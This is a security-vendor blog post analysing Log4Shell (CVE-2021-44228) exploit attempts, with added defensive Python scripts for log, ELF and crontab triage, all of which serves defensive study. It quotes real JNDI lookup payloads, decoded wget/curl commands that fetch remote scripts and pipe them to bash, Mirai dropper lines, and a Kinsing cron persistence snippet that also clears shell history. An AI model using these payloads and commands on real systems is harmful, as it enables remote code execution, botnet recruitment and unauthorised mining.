Threatlabz analysis - Log4shell CVE-2021-44228 exploit attempts

The Zscaler Threatlabz team has been actively monitoring exploit attempts related to the Apache Log4j 0-day remote code execution vulnerability (CVE-2021-44228), also known as "Log4Shell". In this blog we share our analysis of the exploit payloads being delivered through this vulnerability. We will continue to update this blog and share more details as we uncover them during our analysis.

The Threatlabz team has also published a Security Advisory related to this vulnerability.

What is causing this vulnerability?

There is a flaw in the Log4j utility (version 2.0 to 2.15) that lets an attacker who controls log message parameters execute arbitrary code loaded from JNDI endpoints such as LDAP, LDAPS, RMI and DNS.

Log4j Exploit chain

The attacker sends maliciously crafted HTTP requests to the web application server running the vulnerable Log4j utility. Once the request is received, Log4j attempts to load the JNDI resource from an attacker-controlled server and, depending on the protocol used, loads additional components. These components can include a shell script or a Java class that writes a file to disk or memory and executes the final payload.

We have observed multiple botnets, including Mirai and Kinsing (cryptomining), leveraging this Log4j exploit to target vulnerable servers on the Internet. In addition to the Mirai and Kinsing families, we have also seen reports of Cobalt Strike and ransomware-related activity from these exploits.

Exploit Commands Observed

		${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7...
		> wget http://62.210.130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
		
		${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMj...
		> wget -q -O- http://62.210.130[.]250/lh.sh|bash
		
		${jndi:ldap://92.242.40.21:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3...
		> (curl -s 92.242.40[.]21/lh.sh||wget -q -O- 92.242.40[.]21/lh.sh)

Threat actors also appear to be using a network fingerprinting technique before serving stage 2 payloads.

The injected command includes the victim server's IP and port, which the attacker's server checks before serving the malicious payload, as seen below.

		${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1Lj…
		> (curl -s 45.155.205[.]233:5874/<VICTIME-IP:PORT>||wget -q -O- 45.155.205[.]233:5874/<VICTIME-IP:PORT>)|bash
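To triage lookups of this shape in web server logs, the following added Python example (not part of the original post or of Zscaler's tooling) scans access-log lines for ${jndi:...} lookups, extracts the scheme, host and port of the callback server, and decodes the base64 stage-1 command when the path follows the /Basic/Command/Base64/ form shown above, so the decoded command (including any embedded victim IP:port used for fingerprinting) is visible in the report without anything being fetched. The log lines, the TEST-NET addresses and the sample command are constructed for the example.

```python
import base64
import re

# A JNDI lookup embedded in any logged field: ${jndi:<scheme>://<host>[:port]/<path>}
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<rest>[^}\s]+)\}", re.IGNORECASE)
# Path shape used by the exploit servers seen in this post: /Basic/Command/Base64/<command>
B64_CMD_RE = re.compile(r"/Basic/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)")


def defang(text):
    """Rewrite the last dot of every IPv4 address as [.] so report output is not clickable."""
    return re.sub(r"(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})", r"\1[.]\2", text)


def decode_stage1(rest):
    """Decode the base64 stage-1 command from the lookup path, or None if absent or invalid."""
    m = B64_CMD_RE.search(rest)
    if not m:
        return None
    b64 = m.group("b64")
    b64 += "=" * (-len(b64) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-8", "replace")
    except ValueError:                    # binascii.Error is a ValueError subclass
        return None


def analyse_line(line):
    """Return one finding per JNDI lookup in a log line (empty list when the line is clean)."""
    findings = []
    for m in JNDI_RE.finditer(line):
        rest = m.group("rest")
        hostport, _, path = rest.partition("/")
        host, _, port = hostport.partition(":")
        cmd = decode_stage1(rest)
        findings.append({
            "scheme": m.group("scheme").lower(),
            "host": defang(host),
            "port": int(port) if port.isdigit() else None,
            "path": "/" + path,
            "command": defang(cmd) if cmd else None,
        })
    return findings


def scan_log(lines):
    """Run analyse_line over an access log, tagging each finding with its 1-based line number."""
    results = []
    for n, line in enumerate(lines, 1):
        for f in analyse_line(line):
            results.append(dict(line=n, **f))
    return results


# Constructed sample access-log lines (TEST-NET addresses, not real infrastructure). The first
# carries the lookup in the User-Agent header with a base64 stage-1 command built here, the
# second carries a plain RMI lookup in the query string, the third is benign.
_SAMPLE_CMD = "(curl -s 198.51.100.7/lh.sh||wget -q -O- 198.51.100.7/lh.sh)|bash"
_SAMPLE_B64 = base64.b64encode(_SAMPLE_CMD.encode()).decode()
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/Basic/Command/Base64/' + _SAMPLE_B64 + '}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] '
    '"GET /api?q=${jndi:rmi://198.51.100.8:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.2 - - [10/Dec/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOGS):
        print("line %d: %s://%s:%s %s" % (hit["line"], hit["scheme"], hit["host"], hit["port"], hit["path"][:40]))
        if hit["command"]:
            print("  decoded stage-1 command: " + hit["command"])
```

The plain regex is a triage aid for the unobfuscated strings shown in this post; it does not normalize nested or encoded lookup variants, so it complements rather than replaces IPS or WAF signatures, and the decoded command should be read, not run.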

Payload analysis

#1 Mirai Botnet

The shell script lh.sh (MD5: cf2ce888781958e929be430de173a0f8) is downloaded from 62.210.130[.]250 (the attacker's server). When executed, this bash script downloads multiple Linux binary payloads onto the victim machine, sets the execute permission on each of them, and runs them.

		wget http://62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;
		wget http://62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;
		wget http://62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;

All of these binaries belong to the Mirai botnet family and share the same code structure. They are compiled for different architectures (x86 32-bit and 64-bit). There is no code to check the architecture; instead, the attacker simply runs all of the binaries, hoping that one of them will succeed.

These Mirai binaries were configured to communicate with the C2 domain nazi[.]uy on port 25565 and support the following attack commands from the attacker:

UDP flood
SYN flood
ACK flood
TCP stomp flood
GRE IP flood
Connect flood

#2 Kinsing Malware

The shell script lh2.sh (MD5: 0579a8907f34236b754b07331685d79e) is downloaded from 92.242.40[.]21/lh2.sh. It belongs to the Kinsing malware family, which is essentially a coin miner with rootkit capabilities.

The stage 1 bash script (lh2.sh) stops and disables multiple security processes on the victim server before downloading the Kinsing binary, so that the malicious payload is not detected or blocked from executing.

Kinsing is a Golang-based coin miner, as the file output below shows:

		92.242.40.21_kinsing: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v, stripped
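To sort dropped binaries by architecture and linking the way file(1) did for the Kinsing sample above, and to see why the Mirai dropper has to try x86, x86_g and x86_64 in turn, here is an added Python example (not from the original post) that reads the ELF identification bytes, e_machine and program headers. It reports "statically linked" when no PT_INTERP program header is present, which matches the Go binary above; the header-only sample images are constructed inline and contain no code.

```python
import struct

ELF_MAGIC = b"\x7fELF"
CLASSES = {1: "32-bit", 2: "64-bit"}
DATA = {1: "LSB", 2: "MSB"}                      # little- / big-endian, in file(1) wording
TYPES = {2: "executable", 3: "shared object"}
MACHINES = {3: "Intel 80386", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}
PT_INTERP = 3                                    # program header naming the dynamic loader


def parse_elf(data):
    """Classify an ELF image from its ELF and program headers alone (nothing is executed)."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in CLASSES or ei_data not in DATA:
        raise ValueError("unsupported ELF class or data encoding")
    e = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(e + "HH", data[16:20])
    if ei_class == 2:   # ELF64: e_phoff at 32 (8 bytes); e_phentsize/e_phnum at 54/56
        (e_phoff,) = struct.unpack(e + "Q", data[32:40])
        e_phentsize, e_phnum = struct.unpack(e + "HH", data[54:58])
    else:               # ELF32: e_phoff at 28 (4 bytes); e_phentsize/e_phnum at 42/44
        (e_phoff,) = struct.unpack(e + "I", data[28:32])
        e_phentsize, e_phnum = struct.unpack(e + "HH", data[42:46])
    has_interp = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 4 > len(data):              # truncated sample: stop instead of crashing
            break
        (p_type,) = struct.unpack(e + "I", data[off:off + 4])
        if p_type == PT_INTERP:
            has_interp = True
            break
    return {
        "class": CLASSES[ei_class],
        "data": DATA[ei_data],
        "type": TYPES.get(e_type, "unknown(%d)" % e_type),
        "machine": MACHINES.get(e_machine, "unknown(%d)" % e_machine),
        "linking": "dynamically linked" if has_interp else "statically linked",
    }


def describe(data):
    """One-line summary in the style of file(1)."""
    i = parse_elf(data)
    return "ELF %s %s %s, %s, %s" % (i["class"], i["data"], i["type"], i["machine"], i["linking"])


def build_sample_elf(ei_class, e_machine, with_interp):
    """Constructed header-only ELF image (no code), used here as sample input."""
    ident = ELF_MAGIC + bytes([ei_class, 1, 1, 0]) + b"\0" * 8   # little-endian, version 1, SYSV ABI
    p_type = PT_INTERP if with_interp else 1                     # PT_INTERP or PT_LOAD
    if ei_class == 2:
        ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, e_machine, 1, 0x401000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
        phdr = struct.pack("<IIQQQQQQ", p_type, 5, 0, 0x400000, 0x400000, 0, 0, 0x1000)
    else:
        ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, e_machine, 1, 0x8048000, 52, 0, 0, 52, 32, 1, 40, 0, 0)
        phdr = struct.pack("<IIIIIIII", p_type, 0, 0x8048000, 0x8048000, 0, 0, 5, 0x1000)
    return ehdr + phdr


if __name__ == "__main__":
    for name, img in [("x86", build_sample_elf(1, 3, True)), ("x86_64", build_sample_elf(2, 62, False))]:
        print("%-7s %s" % (name, describe(img)))
```

The PT_INTERP heuristic is what file(1) uses for "statically linked" as well; the Go BuildID in the output above lives in a separate note section and is not read here. Running describe over a drop directory is enough to confirm which of the downloaded files could actually execute on the host.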

The bash script also establishes persistence by adding a cron job that periodically downloads and executes updated versions of the bash script from a remote location.

Persistence

		if [ $? -eq 0 ]; then
		echo "cron good"
		else
		(
		  crontab -l 2>/dev/null
		  echo "* * * * * $LDR http://185.191.32[.]198/lh.sh | sh > /dev/null 2>&1"
		) | crontab -
		fi

		history -c

		rm -rf ~/.bash_history

		history -c

Here, the $LDR value is derived from the victim environment and is either "wget -q -O -" or "curl".

185.191.32[.]198/lh.sh downloads and executes the latest Kinsing binary, this time from 80.71.158[.]12/kinsing.
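To find this kind of cron-based persistence on a host, here is an added Python example (not from the original post) that parses crontab text and flags entries that fetch remote content with wget or curl and pipe it into a shell, also noting every-minute schedules and discarded output. The sample crontab is constructed for the example with a TEST-NET address, and the $LDR variable is already expanded to wget -q -O - in one entry and curl in the other, as the script would have written it.

```python
import re

# One crontab entry: five schedule fields (or an @-keyword) followed by the command.
CRON_LINE_RE = re.compile(r"^(?P<sched>@\w+\s+|(?:\S+\s+){5})(?P<cmd>.+)$")
# wget/curl followed, somewhere before the next | ; or &, by a whitespace-delimited URL, host or IP.
FETCH_RE = re.compile(
    r"\b(?:wget|curl)\b[^|;&]*?\s((?:https?://)?(?:(?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)"
    r"(?::\d+)?(?:/[^\s|;&)]*)?)", re.IGNORECASE)
PIPE_SHELL_RE = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
SILENCED_RE = re.compile(r">\s*/dev/null\s+2>&1|&>\s*/dev/null")


def defang(text):
    """Rewrite the last dot of every IPv4 address as [.] so report output is not clickable."""
    return re.sub(r"(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})", r"\1[.]\2", text)


def analyse_crontab(text):
    """Return a finding for every entry that fetches remote content and/or pipes into a shell."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                  # blank, comment or VAR=value line
        m = CRON_LINE_RE.match(line)
        if not m:
            continue
        sched, cmd = m.group("sched").strip(), m.group("cmd").strip()
        fetch = FETCH_RE.search(cmd)
        piped = PIPE_SHELL_RE.search(cmd) is not None
        reasons = []
        if fetch:
            reasons.append("downloads from " + defang(fetch.group(1)))
        if piped:
            reasons.append("pipes output into a shell")
        if sched == "* * * * *":
            reasons.append("runs every minute")
        if SILENCED_RE.search(cmd):
            reasons.append("discards all output")
        severity = "high" if fetch and piped else "medium" if fetch or piped else None
        if severity:
            findings.append({"line": n, "schedule": sched, "command": cmd,
                             "url": defang(fetch.group(1)) if fetch else None,
                             "reasons": reasons, "severity": severity})
    return findings


# Constructed crontab (TEST-NET address, not real infrastructure): two legitimate jobs plus
# two entries shaped like the Kinsing persistence line, one with $LDR expanded to wget, one to curl.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh > /dev/null 2>&1
* * * * * wget -q -O - http://203.0.113.45/lh.sh | sh > /dev/null 2>&1
@reboot curl -s 203.0.113.45/lh.sh|bash
"""

if __name__ == "__main__":
    for f in analyse_crontab(SAMPLE_CRONTAB):
        print("[%s] line %d (%s): %s" % (f["severity"], f["line"], f["schedule"], "; ".join(f["reasons"])))
```

Feed it the output of crontab -l for every user plus the files under /etc/cron.d to cover the places a script like this can write; a download-and-pipe-to-shell entry is reported as high regardless of schedule, while a bare download or bare pipe is reported as medium for review. The cleared shell history in the script above is a reminder that the crontab, not the history, is where this activity remains visible.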

More updates to follow.

Zscaler Detections

ThreatName                       DetectionID   Type Of Detection
Apache.Exploit.CVE-2021-44228    47673         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    47674         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    47675         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    47676         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    47677         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    47707         IPS Web - URL
Apache.Exploit.CVE-2021-44228    47708         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    47711         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    47801         IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228    124803        File-Content (Yara)
Apache.Exploit.CVE-2021-44228    -             File Reputation
Linux.Trojan.Mirai               -             File Reputation
Linux.Trojan.Mirai.LZ            -             URL Reputation
Linux.Rootkit.Kinsing            -             File Reputation
Linux.Rootkit.Kinsing.LZ         -             URL Reputation

Indicators Of Compromise

Mirai Samples
40e3b969906c1a3315e821a8461216bb
6d275af23910c5a31b2d9684bbb9c6f3
1348a00488a5b3097681b6463321d84c

Mirai C2
nazi[.]uy

Mirai Download URLs
62.210.130[.]250/web/admin/x86
62.210.130[.]250/web/admin/x86_g
62.210.130[.]250/web/admin/x86_64

Kinsing Samples
648effa354b3cbaad87b45f48d59c616

Kinsing Shell Scripts
92.242.40[.]21/lh2.sh
80.71.158[.]12.lh.sh

Kinsing Download URLs
92.242.40[.]21/kinsing
80.71.158[.]12/kinsing

Persistence
185.191.32[.]198/lh.sh

Top Exploit Server IPs
37.233.99[.]127:1389
45.137.21[.]9:1389
45.155.205[.]233:12344
45.155.205[.]233:5874
92.242.40[.]21:5557

References

https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html
https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/
